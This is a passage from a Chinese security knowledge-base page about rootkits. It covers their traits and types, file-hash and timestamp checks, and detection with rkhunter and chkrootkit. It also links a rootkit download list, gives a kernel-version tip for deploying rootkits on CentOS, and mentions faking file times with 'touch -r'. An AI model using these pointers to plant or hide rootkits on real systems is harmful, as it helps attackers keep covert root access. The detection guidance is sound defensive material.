</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>注意：修改时间很容易用<code>touch -r</code>伪造成和其它系统文件一致，只能作为参考；更可靠的是用包管理器校验文件哈希，如<code>rpm -V pam</code>（Debian系为<code>debsums -c libpam-modules</code>）。</p> <p><strong>Rootkit工具包</strong></p> <blockquote><p>rootkit是一种特殊的恶意软件。三要素是：<strong>隐藏、操纵、收集数据</strong>。</p> <p>功能是在安装目标上隐藏自身及指定的文件、进程和网络连接等信息</p> <p>常见的rootkit一般都与木马、后门和其它恶意程序结合使用</p> <p><strong>内核级Rootkit通过加载特殊的驱动或内核模块修改系统内核，进而达到隐藏信息的目的</strong>，因此系统内运行的ls、ps、netstat等工具看到的结果都不可信</p> <p>Rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具</p></blockquote> <p><strong>Rootkit类型</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>固件Rootkit
虚拟化Rootkit
内核级Rootkit
库级Rootkit
应用级Rootkit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>Rootkit工具包列表</strong>：https://github.com/d30sa1/RootKits-List-Download  （注意与<code>Centos</code>内核版本适配，内核级Rootkit版本不匹配会直接导致系统崩溃）</p> <p><strong>检测与防护：</strong></p> <p>rkhunter：http://rkhunter.sourceforge.net/</p> <p>chkrootkit：http://www.chkrootkit.org/download/</p> <p>定期用包管理器校验系统文件的哈希（<code>rpm -Va</code>、<code>debsums</code>），并尽量从可信的启动介质离线检查，因为内核级Rootkit会让系统内运行的检测工具看不到被隐藏的文件和进程。对于确认被植入Rootkit的主机，最可靠的处置是保留取证镜像后从可信介质擦除并重新安装系统，而不是尝试原地清除。</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/to-root.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/54.d132c2f8.js" defer></script>
  </body>
</html>